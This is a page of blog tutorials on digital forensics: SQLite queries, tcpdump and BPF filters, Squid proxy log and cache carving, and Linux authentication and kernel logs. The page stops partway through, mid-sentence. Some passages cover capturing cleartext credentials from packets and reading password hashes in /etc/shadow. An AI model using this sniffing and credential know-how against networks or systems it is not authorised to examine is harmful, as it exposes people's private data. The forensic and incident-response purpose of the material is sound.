
Please access this website using a laptop / desktop or tablet for the best experience
Search Results
497 results found with an empty search
- Forensic Analysis of SQLite Databases
SQLite databases are widely used across multiple platforms, including mobile devices, web browsers, and desktop applications. Forensic analysts often encounter SQLite databases during investigations, making it essential to understand their structure and the tools available for analyzing them . Understanding SQLite Databases SQLite databases consist of multiple files , each serving a specific purpose. Identifying these files is crucial during forensic investigations: Main Database File: Typically has extensions such as .db, .sqlite, .sqlitedb, .storedata , or sometimes no extension at all. Write Ahead Log (WAL): A .wal file that may contain uncommitted transactions, providing additional forensic insights. Shared Memory File: A .shm file that facilitates transactions but does not store data permanently. Analyzing SQLite Databases An SQLite database consists of tables that store data in columns. Some databases have a single table, while others contain hundreds, each with unique schemas and data types. When performing forensic analysis, it’s important to understand how these tables interact and how data is stored. Tools for SQLite Analysis Forensic analysts use various tools to examine SQLite databases. These tools fall into two main categories: GUI-Based Viewers: User-friendly tools like DB Browser for SQLite allow visual analysis but may automatically merge WAL file transactions into the main database. Command-Line Utilities: Tools like sqlite3 provide a powerful way to run queries and extract data, making them ideal for scripting and automation. Forensic-Specific Tools: These tools offer advanced recovery features, allowing analysts to examine deleted records and unmerged transactions. Querying SQLite Databases Once the database structure is understood, analysts can run SQL queries to extract relevant information. Below are key SQL operations commonly used in forensic investigations: 1. Using the SELECT Statement The SELECT statement retrieves data from a table. The simplest form is: SELECT * FROM fsevents; This retrieves all columns from the access table. However, for targeted analysis, selecting specific columns is more efficient: SELECT fullpath, filename, type, flags, source_modified_time FROM fsevents; When multiple tables share column names, it’s best to specify the table name: SELECT access.service, access.client FROM access; 2. Converting Timestamps Many SQLite databases store timestamps in Unix epoch format. Converting them to a readable format is crucial for timeline analysis: SELECT url, visit_time,datetime((visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM visits; The AS keyword renames the column for better readability. 3. Using DISTINCT to Find Unique Values The DISTINCT keyword helps identify unique values within a column . For instance, to find unique permission types in the access table: SELECT DISTINCT url FROM urls; 5. Using CASE for Readability To make data more understandable, analysts can use the CASE expression to replace numerical values with meaningful labels: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls 6. Sorting Data with ORDER BY Sorting records chronologically can help establish an event timeline. The ORDER BY clause arranges records based on a specified column: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls ORDER BY last_modified DESC; 7. Filtering Data with WHERE and LIKE For large datasets, filtering results is essential. The WHERE clause helps narrow down data based on conditions: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls WHERE last_modified LIKE '2025-01-16%' The % wildcard allows partial matches, making it useful for date-based searches. ----------------------------------------------------------------------------------------------------------- Conclusion SQLite database forensics plays a crucial role in digital investigations, from mobile forensics to malware analysis. By understanding SQLite file structures, using the right tools, and applying effective query techniques, forensic analysts can extract valuable insights from databases. -------------------------------------------------Dean-----------------------------------------------
- BPF Ninja: Making Sense of Tcpdump, Wireshark, and the PCAP World
Hey folks! Today we’re diving into a topic every network forensic analyst must get familiar with: tcpdump and the power-packed world around it— Wireshark , pcap , pcapng , and all the little details that actually matter when you're dealing with real-life packet analysis. If you’re like me and enjoy understanding why a tool works the way it does (and not just copy-pasting commands from Stack Overflow), this blog’s for you So, What’s tcpdump and Why Should You Care? Imagine this: You're investigating suspicious traffic, and all you’ve got is command line access. You need something light, fast, reliable—and boom— tcpdump comes to your rescue. It’s a CLI-based packet capture tool that lets you sniff traffic in real time, apply filters, and save packet data for analysis. Originally born in the *NIX universe , it now works on Windows too. Pretty cool, right? Under the hood, tcpdump uses the legendary libpcap library, which is like the oxygen tcpdump breathes. Here's what makes it so useful: 💡 Key Superpowers of tcpdump (Thanks to libpcap): 🔍 1. BPF (Berkeley Packet Filter) This is a simple filtering language that lets you capture only the traffic you want . For example: tcpdump port 443 and host 192.168.1.9 Boom—you’re only grabbing HTTPS packets to/from that host. 💾 2. Capture or Save Packets You can choose to display packet headers on-screen, or save them into .pcap files to analyze later. These files are gold for forensic investigations. Imagine capturing something today and analyzing it 3 years later—yep, pcap has your back. 🔁 3. Live or Offline tcpdump can sniff a live interface or read from a saved .pcap file as if it’s a live stream. That’s super helpful when you’re analyzing a case retrospectively. 📏 4. Snaplen Control Don't want to capture entire packets because of size or legal constraints? Use -s to define the snap length (i.e., number of bytes to capture per packet). Capturing just the headers? No problem. tcpdump -s 96 -i eth0 -w output.pcap 🧠 Heads-Up: tcpdump Is for Capturing, Not Deep Diving tcpdump is great for capturing data, but it doesn’t do fancy analysis . When you want to dissect those packets like a digital autopsy, you bring in the big gun: Wireshark . 🐟 Enter Wireshark: Your Friendly GUI Packet Analyzer Wireshark is a graphical application that reads .pcap and .pcapng files, and honestly, it's a lifesaver when you're trying to figure out what went down on the wire. It decodes hundreds of protocols out of the box and lays everything out for you in a beautiful 3-pane display. What makes Wireshark insanely useful: Auto-dissectors for common protocols Follow TCP Stream feature for full conversation analysis Color-coded filtering Click-and-zoom details for every packet field Pro tip: You can capture packets directly in Wireshark, but for high-volume environments or remote machines, stick with tcpdump. 📟 Want CLI Power with Wireshark's Brain? Use tshark Wireshark also comes with tshark , its CLI twin. So you can build your filters in Wireshark’s GUI and then export them to tshark scripts—perfect for large-scale or automated analysis. tshark -r test.pcap -Y "http.request.method == GET" 📂 What’s Really Inside a .pcap File? Okay, this is where things get forensically juicy. A .pcap file is not just a bunch of packets thrown together. It includes metadata that matters: File Header Includes: Magic Bytes: Helps identify it as a pcap file. Most common = 0xd4c3b2a1 (little-endian). Version: For libpcap compatibility. Timestamp Offset: Usually zero (all timestamps are in UTC—thank god). Snaplen: Max bytes per packet saved. Link Type: Like Ethernet, Wi-Fi, etc. Each Packet Entry Has: Timestamp (seconds + microseconds since epoch) Captured Length Original Packet Length (in case it was truncated) These tiny details help determine whether you lost data during capture or were just intentionally limiting it. 📦 pcapng: The Next-Gen Format (but Be Careful) Then comes pcapng —aka pcap Next Generation . It’s more flexible and stores: Multiple interfaces in one file Rich metadata (like capture comments) Higher-res timestamps Interface stats and DNS logs Sounds awesome, right? But here’s the catch : Not all tools support it properly . Even some versions of tcpdump can’t read pcapng without throwing vague errors. So what do we do? Convert it to regular pcap using editcap (comes with Wireshark): editcap -F pcap captured_file.pcapng capture_file.pcap Double-check with: file capture_file.pcap And voilà—you’re back in business. 🛠️ Thoughts: tcpdump and Wireshark = A Power Combo Here’s how I look at it: Use tcpdump for quick, controlled, stealthy captures (especially remotely or over SSH). Use Wireshark for visual, detailed, protocol-level analysis. Use tshark when you need scripting and automation. Stick to pcap unless you absolutely need pcapng features. Always verify your captures. A truncated packet can break your case. -------------------------------------------------------------------------------------------------- Lets talk about BPF Filters We’re diving into something that might sound dry but is actually one of the most powerful tools in your network forensics and incident response toolkit: BPF (Berkeley Packet Filter) syntax . Now, if you’ve worked with tcpdump, Wireshark, or even snort or bro/zeek, you’ve already touched BPF . Think of it like your VIP bouncer at a nightclub—BPF decides what packets are "interesting" enough to get through the door and what gets kicked to the curb. 🧹 So why should you care? Because it’s super-efficient , running close to the kernel, and helps you cut down on noise , saving time and resources during investigations or live captures. 🧠 What Even Is BPF? At its core, BPF is a way to tell your system, “ Only give me the packets I care about.” It’s a language that lets you define filters for capturing or processing packets. Since tools like tcpdump and Wireshark use libpcap under the hood, BPF filters work across most major packet capture tools. That’s why learning it once pays off everywhere . 🧱 BPF Primitives: The Basics Let’s say you're filtering water through a sieve. The holes in that sieve are your BPF filters . The smaller and more specific the holes, the more precise the capture. Here are the building blocks (called primitives ): ip, ip6, tcp, udp, icmp: Protocol matchers. ip is IPv4 traffic. ip6 is IPv6. If you want both: ip or ip6. host: Filters packets by IP address (Layer 3). Example: host 192.168.1.1 ether host: Filters by MAC address (Layer 2). Example: ether host 00:11:BA:8c:98:d3 net: Filters by network range (CIDR). Example: net 172.168.1.1/8 port: Filters by TCP/UDP port (Layer 4). Example: port 443 (catches both TCP and UDP unless specified) portrange: A range of ports. Example: portrange 20-25 💡 Tip: BPF is stateless . It evaluates each packet independently, so if you're tracking a flow or multi-step exchange, that's handled in higher layers (e.g., Zeek, Suricata). 🔄 Directional Filters: src, dst, both? Sometimes, you don’t want all traffic to/from an IP—maybe just the ones sent by it. Here’s how direction works: src host 192.168.1.1 → only source. dst port 443 → only destination. ether src 00:11:BA:8c:98:d3 → source MAC. src net 172.168.1.1/8 → source from entire subnet. ⚠️ Note: When you say just host, port, or net, it’s bidirectional. Be specific if needed! 🧮 Combining Filters: AND, OR, NOT This is where it gets fun (and powerful). You can combine primitives logically: tcp and (port 80 or port 443) and not host 192.168.1.1 ⬆️ That says:“Give me all TCP traffic on ports 80 or 443, but exclude anything involving 192.168.1.1.” 📌 Wrap complex filters in quotes , especially in shell commands. Shells interpret parentheses and spaces—don’t let that ruin your day. 🧪 Advanced Primitives (Forensics-Friendly) You’ll probably need these in more forensic-heavy cases: vlan 100 → Capture traffic on VLAN 100. gateway → Detect packets with mismatched Layer 2/3 addressing (good for catching rogue devices). Byte offsets & bitmasks → Ultra-specific matching based on packet byte positions. (More niche, but very powerful!) 🧰 Tcpdump Tips for Real-World Use Let’s be honest—tcpdump can do a LOT more than just watch packets fly by your screen. Here are some gold-nugget options: Flag What it does -i any Capture from all interfaces. -n Disable DNS resolution (important for stealth & speed). -r file.pcap Read from a PCAP instead of live traffic. -w out.pcap Write captured packets to a file. -C 5 Rotate output every 5MB. -G 30 Rotate output every 30 seconds. Use with -w and time-formatted filenames like: -w dump_%F_%T.pcap. -W 10 Keep only the last 10 files (used with -C or -G). -F filter.txt Load a complex BPF filter from a file instead of typing it inline. Super helpful in team environments. 🎯 Real-Life Example: Reducing a PCAP for Wireshark Imagine you’ve got a 500MB pcap file but Wireshark can barely open it. You want to reduce it to something smaller—say, only traffic on HTTP/S or exclude noisy DNS and multicast. Here’s how: tcpdump -n -r full_capture.pcap -w reduced_capture.pcap 'tcp and (port 80 or port 443) and not port 53 and not net 192.168.1.1/4' 💡 This can cut the file size by almost 40–50% if the excluded traffic is significant. 📚 TL;DR - Quick Reference Use quotes! 'port 80 and not host 10.0.0.1' Know your direction: src, dst, host, ether host Reduce noise: Use -n to disable DNS, and filter early Modularize filters: Use -F for long BPFs Save time: Use -C, -G, -W for file rotation -------------------------------------------------------------------------------------------------- Before ending todays article, I want to give few commands which might be helpful for you First Let’s admit it — network forensics can sound scary at first. You open up Wireshark or run tcpdump and BAM! — thousands of packets flying across the screen like it's The Matrix. Let’s jump into some cool and useful tcpdump commands with real-world examples and context. Example 1: Live Sniffing on an Interface — But Keep It Light sudo tcpdump -n -s 100 -A -i eth0 -c 1000 🧠 What it does : Monitors the eth0 interface (you can replace it with yours etc.) Captures only the first 100 bytes of each packet (-s 100) to avoid dumping the whole packet — helpful for big networks. -A dumps the actual ASCII content , which is super helpful for catching things like HTTP requests, cleartext creds, etc. Stops after 1000 packets (-c 1000) so you don’t go blind. -n speeds things up by not resolving DNS or port numbers — we want raw IPs and ports. Example 2: Filter a pcap file for traffic from one host tcpdump -n -r captured.pcap -w filtered.pcap 'host 192.168.1.1' 📂 You already have a .pcap file but you’re only interested in what one machine (say, 192.168.1.1) was up to. -r captured.pcap: Reads the original pcap. -w filtered.pcap: Writes only the filtered traffic. 'host 192.168.1.1': Our BPF (Berkeley Packet Filter) here filters both source or destination . 🧪 Try changing 'host' to: 'src host 192.168.1.1': only source 'dst host 192.168.1.1': only destination Example 3: Rotate Files Daily for 2 Weeks — DNS Focused sudo tcpdump -n -i eth0 -w dns-%F.%T.pcap -G 86400 -W 14 '(tcp or udp) and port 53' 🧠 What’s going on here: We’re capturing DNS traffic only (TCP or UDP on port 53). -w dns-%F.%T.pcap: Writes files with timestamps (great for organizing). -G 86400: Rotates every 86,400 seconds = 1 day. -W 14: Keeps only 14 files, so after 2 weeks, it stops or starts overwriting depending on your logic. Perfect for long-term DNS analysis (e.g., DNS tunneling detection, malware beaconing). Example 4: Rotating 100MB Files of Suspected APT Host Traffic sudo tcpdump -n -i eth0-w suspected.pcap -C 100 'host 192.168.1.1' 🔍 Use this when you want to capture unlimited traffic to/from a shady IP, but don’t want your disk to explode. -C 100: Rolls over to a new file every 100MB. Files will be named like: suspected.pcap, suspected1.pcap, suspected2.pcap, etc. 💡 Tip: Add -W to limit how many files you keep: -W 10 Example 5: Filter HTTP Traffic (not encrypted) and show requests sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' 😅 I know, this one looks scary. But here's what it's doing: Filters HTTP requests only (and not empty ACKs or TCP keepalives). -A + -s 0 dumps full ASCII of each packet — you can literally see GET and POST requests. Real use case : Someone accessed your internal web app over HTTP. You suspect credential theft or command injection. This gives you a live view of the payloads . Example 6: Capture suspicious outbound connections to multiple ranges sudo tcpdump -i eth0 'dst net 185.100.87.0/24 or dst net 91.219.236.0/24' 🎯 This captures outbound traffic to known shady subnets. Perfect when you're watching beaconing or C2 callbacks. You can expand the filter like this: '((dst net 185.100.87.0/24) or (dst net 91.219.236.0/24)) and not port 443' 👉 Exclude HTTPS to avoid noise! Tips from Me Always test your BPF filter on small captures using -c 100 to make sure it’s not too broad. Wireshark’s filter syntax ≠ tcpdump syntax! In Wireshark, you use ip.addr == x.x.x.x, but in tcpdump you just say 'host x.x.x.x'. Use tcpdump -D to list all interfaces. When in doubt, log to file first , analyze later. Don't grep in real-time unless you know what you're doing. Bonus: Convert pcap to readable text Want to take a .pcap and turn it into readable logs? tcpdump -nn -tttt -r suspicious.pcap > readable_logs.txt You’ll get timestamps + decoded traffic — perfect for incident timelines or report writing. Final Words Tcpdump is one of those tools that feels a bit raw at first, but once you get the hang of BPF filters, it's like having X-ray vision for your network. It's lightweight, powerful, and deadly accurate when used right. Combine it with tools like Wireshark for analysis and you've got a forensic powerhouse in your hands. ------------------------------------------------Dean-------------------------------------------------
- Proxies in DFIR– Deep Dive into Squid Log & Cache Forensics with Calamaris and Extraction Techniques
I’m going to walk you through how to analyze proxy logs—what tools you can use, what patterns to look for, and where to dig deeper—but keep in mind, every investigation is different, so while I’ll show you the process, the real analysis is something you will need to drive based on your case. Let’s talk about something that’s often sitting quietly in the background of many networks but plays a huge role when an investigation kicks off: Proxies . Whether you’re a forensic analyst, an incident responder, or just someone interested in how network traffic is monitored, proxies are your silent allies. 🧭 First Things First: What Does a Proxy Even Do? Think of a proxy like a middleman between users and the internet . Every time a user accesses a website, the request goes through the proxy first. This is awesome for: Monitoring user activity : Who went where, when, and what happened. Enforcing policies : Blocking sketchy sites or filtering content. Caching : Saving bandwidth by storing frequently accessed content locally. And the best part? Proxies keep logs . Gold mines for investigations. 🔍 Why Proxy Logs Are a Big Deal in Forensics When you're dealing with a potential breach or malware incident, one of the first questions is: Who visited what site? Now, imagine going machine-by-machine trying to find that out… 😫 That’s where proxy logs shine: ✅ Speed up investigations ✅ Quickly identify systems reaching out to malicious URLs ✅ Track timelines without touching each device individually And even better— some proxies cache content . So even if malware was downloaded and deleted from a device, the proxy might still have a copy in its cache. Lifesaver. 🐙 Enter Squid Proxy – A Favorite Squid is a widely used HTTP proxy server. If you’ve worked in enterprise environments, chances are you’ve run into it. 🧾 Key Squid File Paths: Config file: /etc/squid/squid.conf Logs: /var/log/squid/* Cache: /var/spool/squid/ These are your go-to places when digging into evidence. ----------------------------------------------------------------------------------------------------------- 📈 What You Can Learn from Squid Logs Squid logs tell you things like: Field Example What It Means UNIX Timestamp 1608838269.433 Date/time of the request Response Time 531 Time taken to respond (in ms) Client IP 192.168.10.10 Who made the request Cache/HTTP Status TCP_MISS/200 Was it cached? Was it successful? Reply Size 17746 Size of response HTTP Method GET Type of request URL https://www.cyberengage.org/ Site accessed Source Server DIRECT/192.168.0.0 Origin server IP MIME Type text/html Content type returned So from one single log line, you can know who accessed what , when , and how the proxy handled it. 🧠 Bonus Info: Cache Status Codes That Help You Analyze TCP_HIT: Content served from cache TCP_MISS: Had to fetch from the internet TCP_REFRESH_HIT: Cached content was revalidated TCP_DENIED: Blocked by proxy rules This gives you an idea of how users interact with sites and how often content is being reused. ----------------------------------------------------------------------------------------------------------- ⚠️ Default Squid Logs Are Good… But Not Perfect Here’s the catch: By default, Squid doesn’t log everything you might want during an investigation. For example: 🚫 No User-Agent 🚫 No Referer 🚫 Query strings (like ?user=admin&pass=1234) are stripped by default This can hurt if malware uses obfuscated URLs or redirects. But don’t worry—Squid is super customizable. 🔧 How to Improve Squid Logs for Better Visibility You can change the Squid log format to include things like the User-Agent and Referer. ✅ Example Configuration (Put this in squid.conf): logformat combined %>a %[ui %[un [%tl] "%rm %ru HTTP/%rv" %>Hs %a: Client IP %tl: Local time (human-readable) %rm %ru: HTTP method and URL %>Hs: Status code (200, 404, etc.) %h: Page that referred the user %{User-Agent}>h: Browser or software used %Ss:%Sh: Cache and hierarchy status Boom. Now your logs are a forensic analyst’s dream. 🔍 Sample Human-Readable Log Entry 192.1688.10.10 - - [30/Apr/2025:00:00:00 +0000] "GET https://www.cyberengage.org/...js HTTP/1.1" 200 38986 "http://https://www.cyberengage11.org/..." "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)... Firefox/47.0" TCP_MISS:HIER_DIRECT From this one line, we can tell: The user at IP 192.1688.10.10 accessed a JavaScript file The browser was Firefox on Windows The request wasn't cached (TCP_MISS) That’s a full story from one log entry. ----------------------------------------------------------------------------------------------------------- 🛑 But Wait—A Word of Caution! Want to log query strings or detailed headers? You must change your config. # In /etc/squid/squid.conf strip_query_terms off ⚠️ Warning : This could capture sensitive data (like usernames/passwords in URLs), so make sure you’re authorized to log this. Respect privacy policies. ----------------------------------------------------------------------------------------------------------- Alright, let’s get real. When you're looking at a Squid proxy for investigation, it can look like a mess of logs, cache files, and cryptic timestamps. But trust me, with the right tools and techniques, you'll be digging up web activity and cached secrets like a forensic wizard . 🛠️ Let’s Begin with a Tool – Calamaris So first up, there's this pretty slick tool called Calamaris – great for getting summaries out of Squid logs. It's not fancy-looking, but it's efficient, and sometimes that's all you need. You can check out the tool here: Calamaris Official Page To install it inside your WSL (Windows Subsystem for Linux), just run: sudo apt install calamaris Boom. Installed. Now let’s analyze a Squid access log: cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy/proxy2/squid/squid/access.log | calamaris -a And just like that, it spits out a clean summary. Requests, clients, status codes—it’s all there. This makes the initial review of a log super simple. 🔎 BUT... there’s a catch. If your Squid logs use a custom format (which happens often in real environments), Calamaris might fumble. So if your output looks weird or incomplete , don’t panic—we’ll have to get our hands dirty and analyze stuff manually. Let’s keep going. 🕰️ Dealing with Timestamps – From Unix to Human By default, Squid logs come with UNIX epoch timestamps . Unless you're a robot, they aren't human-friendly. But converting them is easy. Use this: date -u -d @1742462110.226 That -u gives you UTC format (ideal for timeline consistency). Now you're thinking—"Akash, am I supposed to convert each timestamp manually?" Heck no. Here's a one-liner that’ll do the job for the entire log file: sudo cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy2/squid/squid/access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}' > /mnt/c/Users/Akash\'s/Downloads/readable.txt This outputs a clean, readable version of your log into readable.txt. 📂 Important Files to Collect in a Squid Forensic Investigation While you’re getting into the logs, don’t forget to grab these essentials: /etc/squid/squid.conf – Config file that tells you how the proxy works, where logs are stored, ACLs, cache settings, etc. /var/log/squid/access.log – The main access log (you’ll be here a lot) /var/log/squid/referer.log, /useragent.log, /cache.log, /store.log – All useful for understanding context like who clicked what, what browser they used, cache hits/misses, etc. 🔍 Starting Your Investigation – Log Hunting Let’s say you’re investigating activity around google.com . Start basic: grep google.com access.log Now you can narrow it down further. Want to see only GET or POST requests? grep "GET.*google.com" access.log Start building a timeline from here—this is your story-building phase in an incident investigation. ----------------------------------------------------------------------------------------------------------- 💾 Let’s Talk About Cache – One of the Juiciest Parts Squid caches web objects to speed things up. This means files , URLs , images , even docs might be sitting there waiting to be carved out. Default cache path: /var/spool/squid/ Here, cached files are stored in a structured format like: /var/spool/squid/00/05/000005F4 If you want to inspect these: grep -rail www.google.com /var/spool/squid/ Flags explained: -r: Recursively search -a: Treat files as ASCII -i: Case-insensitive -l: Show filenames only -F: Literal search (no regex overhead) Then use strings to dig deeper into the cache object: strings -n 10 /var/spool/squid/00/05/000005F4 | grep ^http | head -n 1 This gives you clean URLs that were cached. ----------------------------------------------------------------------------------------------------------- 📤 Extracting Actual Files from Cache Let’s say you found a cached .doc file and want to pull it out. Here's how: Find it: grep -rail file.doc ./ Example output: 00/0e/00000E20 Examine it: strings -n 10 00/0e/00000E20 Check for headers like: Content-Type: Cache-Control: Expires: This tells you what’s inside the file and why it was cached. Carve the file: Use a hex editor like ghex to open the file and locate the 0x0D0A0D0A byte pattern (that’s the HTTP header/body separator). Delete all the bytes before this pattern and save the result to a new file. Identify the file type: file carved_output If it says something like “Microsoft Word Document,” you’ve got your artifact extracted. Mission success! 💥 ----------------------------------------------------------------------------------------------------------- 🔗 Extra Resources You’ll Love Want to keep up with new tools for analyzing Squid? Bookmark this: 👉 Squid Log Analysis Tools List (Official) And don’t forget to explore another gem: 👉 SquidView Tool – Neat for interactive visual log analysis. ----------------------------------------------------------------------------------------------------------- 🧠 Final Thought Log and cache analysis in Squid isn't just about reading boring log lines. It's storytelling through network artifacts. From timestamps to URLs, from GETs to cached DOC files—every bit tells you something. The trick is not just knowing what to look for—but knowing how to get it out. If you're starting your journey with Squid forensics, this is your friendly roadmap. And hey, the more you do it, the more patterns you start seeing. It becomes second nature. ---------------------------------------------Dean----------------------------------------------------------
- Understanding Linux: Kernel Logs, Syslogs, Authentication Logs, and User Management
Alright, let’s break down Linux user management, authentication, and logging in a way that actually makes sense, especially if you’ve been on both Windows and Linux systems. 🔑 1. Unique Identifiers in Linux vs Windows First off, let’s talk about how users are identified: Windows uses SIDs (Security Identifiers) — long strings like S-1-5-21-... to uniquely identify users. Linux , on the other hand, uses UIDs (User IDs) for users and GIDs (Group IDs) for groups. 👉 Quick Tip: Regular user accounts start from UID 1000 and above. Anything below 1000 is usually a system or service account (like daemon, syslog, etc.). 📂 2. Where Is User Info Stored in Linux? 🧾 /etc/passwd This file holds basic user info : username , UID , GID , home directory , and shell (like /bin/bash or /usr/sbin/nologin). cat /etc/passwd You'll see entries like: akash:x:1001:1001:Akash,,,:/home/akash:/bin/bash 🔐 /etc/shadow This one is where the actual (hashed) passwords are stored — not in /etc/passwd. It’s restricted to root for a reason. sudo cat /etc/shadow You’ll notice hashed passwords that look something like this: akash:$6$randomsalt$verylonghashedpassword:19428:0:99999:7::: That $6$ means it’s hashed using SHA-512 . Other common password hashing algorithms in Linux: MD5 , Blowfish , SHA-256 , and SHA-512 . All of these use salting and multiple hashing rounds for added security. 👥 3. Managing Users in Linux (Commands You’ll Actually Use) Here are the most common commands: Command What It Does useradd Add a new user userdel Remove a user usermod Modify user properties chsh Change a user’s default shell passwd Set or change a user's password All of this ties into how Linux handles access and sessions. 🛡️ 4. How Linux Handles Authentication (Thanks to PAM) PAM stands for Pluggable Authentication Modules — and it’s the brain behind how Linux checks your credentials. 🗂️ Where are the PAM config files? /etc/pam.d/ : Main directory for PAM config files for individual services (like sshd, login, sudo, etc.) /etc/security/access.conf : You can use this to allow or deny users based on IP, group, etc. Example: -:akash:ALL EXCEPT 192.168.1.100 This means Akash can only log in from the IP 192.168.1.100. 🧩 PAM Modules Location These are .so files (shared object libraries) that do the heavy lifting. RHEL-based distros : /usr/lib64/security/ Debian-based distros : /usr/lib/x86_64-linux-gnu/security/ Think of them like Linux’s version of Windows DLLs but for authentication logic. 🔄 How PAM Authentication Works (Step by Step) User enters credentials (username + password). System loads PAM config from /etc/pam.d/*. Relevant modules get called from /usr/lib/.... Password is compared with the hash in /etc/shadow. If valid , session gets started. Authentication logs are written — usually in /var/log/auth.log or /var/log/secure. Access is granted or denied . Simple but powerful. --------------------------------------------------------------------------------------- 📜 5. Logging – Where to Look 🗂️ Where Does Linux Log Authentication Stuff? Linux keeps logs under the /var/log/ directory — that’s the central place where you’ll find all sorts of system and user-related logs. 1. /var/log/auth.log (Debian/Ubuntu systems) This is your go-to file when investigating: Logins via terminal, SSH, or sudo Session starts/stops Authentication failures and successes Use tail -f /var/log/auth.log to monitor real-time logins.For older, compressed logs, use: zcat /var/log/auth.log.1.gz. Also, fun fact: cron job logs land here too, because cron has to authenticate users before running scheduled tasks. 2. /var/log/secure (Red Hat/CentOS/Fedora systems) Same purpose as auth.log but without cron logs. So if you’re hunting down brute-force attempts or failed SSH logins on RHEL or CentOS, this is your place. 3. /var/log/failog This one specifically logs failed login attempts , but here’s the twist: On Ubuntu/Debian, it’s there, but only if you configure pam_faillock. On RHEL-based systems, it’s often not enabled by default. Use faillog -a to check all failed attempts. 4. /var/log/lastlog Want to know when a user last logged in? Boom — this file’s got you covered. Run lastlog -u akash to check last login time for user akash. Neat for checking dormant accounts or for basic auditing. 5. /var/log/btmp This file tracks failed login attempts , but it’s in binary format — so don’t try to cat it like a text file. Use lastb or lastb -f /var/log/btmp to view it cleanly. 6. /var/log/wtmp It logs all login/logout events, system reboots, and shutdowns. Run last to read it.Or for a forensic dump from a dead system: last -f /mnt/disk/var/log/wtmp 7. /run/utmp This file is more “live.” It tracks users currently logged in . Use who or w to view who's online right now. 🔍 How Long Are Logs Kept? Linux usually keeps logs for 4 weeks by default, rotating them weekly. Older logs get compressed (you’ll see .gz files). So for deeper dives: Use zcat or zless to view archived logs Use strings, hexdump, or a hex editor to read binary logs like btmp, wtmp, or utmp in raw forensics scenarios 🧪 Quick Command Recap Command Purpose last Shows logins/logouts from /var/log/wtmp lastb Shows failed logins from /var/log/btmp faillog -a View all failed login attempts who / w Shows currently logged-in users (from utmp) lastlog -u user Shows last login info from lastlog 🧠 Bonus: How Syslog and Kernel Logging Works in Linux Let’s talk Syslog — the backbone of Linux logging. Syslog isn’t a file — it’s a standard protocol used by system processes to send log messages to a log server (or local file). It’s used across services, from SSH to cron, and it categorizes logs by: Facility (like auth, kernel, daemon) Severity (info, warning, error, critical) Common Syslog Implementations: rsyslog (most common these days) syslog-ng journald (used with systemd) 🗂️ Key System Log Files 1. /var/log/syslog (Ubuntu/Debian) This is like a catch-all system log . You’ll find: Kernel messages App-level logs Cron logs Hardware issues It’s super useful when you’re not sure what exactly went wrong but want a timeline of everything. Use tail -f /var/log/syslog or grep through it to find events. 2. /var/log/messages (RHEL/CentOS/Fedora) Think of this as the Fedora-flavored syslog . It logs similar data — services, kernel messages, application errors — but it’s the default log file for those distros. Want to Go Pro Mode? You can even forward logs to a central log server using rsyslog or syslog-ng. Perfect for SIEM integration or enterprise setups. 🚨 Tip: Watch Those Binary Logs Files like wtmp, btmp, and utmp are not plain-text , so don’t expect to read them with cat. Either use the right commands (last, lastb, who, etc.) or open them in a hex editor when you’re in full forensic mode. --------------------------------------------------------------------------------------- Let’s talk about something super important but often overlooked — kernel logs in Linux . These logs are goldmines when it comes to diagnosing system-level problems like driver issues, boot errors, or hardware failures. But if you're like most people, kernel logging might feel a bit messy because of the variety of tools and file paths involved across distros. So, let's break it all down in plain language. 🧠 First Things First — What’s dmesg All About? The dmesg command is your go-to tool when you want to see what the Linux kernel has been up to — especially right after booting. It shows stuff like: Hardware detection Driver loading Device initialization (like USBs, disks, network interfaces) Boot-time errors Basically, if something is going wrong at the very core of your OS — this is where you'll see the first red flags. 🔧 How to Use It? Just pop open a terminal and run: dmesg You’ll see a big wall of text. You can pipe it to less or grep for easier viewing: dmesg | grep -i error Now here’s the catch: this output comes from the kernel ring buffer — which is in memory. That means once the system reboots, poof — it’s gone unless you’ve saved it. 📁 But Wait — Where Is This Stuff Saved? On some distros, it actually is saved! 🗂️ /var/log/dmesg (Only on Some Systems) This file captures the output of dmesg from the last boot and stores it permanently. You can just run: less /var/log/dmesg But don’t count on it being available on all systems. For example: Debian/Ubuntu: You’re likely to find it. Fedora/RHEL/Rocky: Nope. They use journald instead (more on that in a sec). 📚 Enter /var/log/kern.log — The Persistent Hero Now this one’s interesting. The kern.log file contains all kernel messages — just like dmesg — but it sticks around even after rebooting. That means you can go back and check what the kernel was doing a week ago if your system started acting weird after an update or new hardware installation. View it like this: less /var/log/kern.log 🕒 Bonus: Time Stamps Unlike the raw dmesg output that shows uptime seconds (like [ 3.421546]), the messages in kern.log come with real human-readable timestamps , making it way easier to match with user events. 🧰 What About Fedora, RHEL, Rocky Linux? Alright, now let’s talk Fedora-style distros . They’ve moved away from traditional log files and now rely heavily on systemd's journald service . So files like /var/log/kern.log or /var/log/dmesg? You won't find them here. Instead, everything is logged into the system journal . ✅ How to View Kernel Logs? journalctl -k That gives you only kernel logs from the journal. Super clean, super easy. You can also use filters like: journalctl -k --since "2 days ago" --------------------------------------------------------------------------------------- 💾 Persistent vs Non-Persistent Logs (This Is Crucial!) Systemd-based distros can either store logs in memory (volatile) or on disk (persistent). Whether or not your logs survive reboot depends on how journald is set up. If logs are stored in /var/log/journal, they’re persistent . If not, and only in /run/log/journal, they’re gone after reboot . So if you're doing forensics on a deadbox, you’d better hope /var/log/journal exists. --------------------------------------------------------------------------------------- 💀 Deadbox Log Hunting Tips If you're working on a dead system and trying to dig into what happened before it went down: Mount the disk using a live CD or forensic OS. Navigate to /var/log/journal/ if it exists. Use journalctl --directory=/mount/path/var/log/journal to view the logs. If nothing's there? You're kinda outta luck unless you've got other 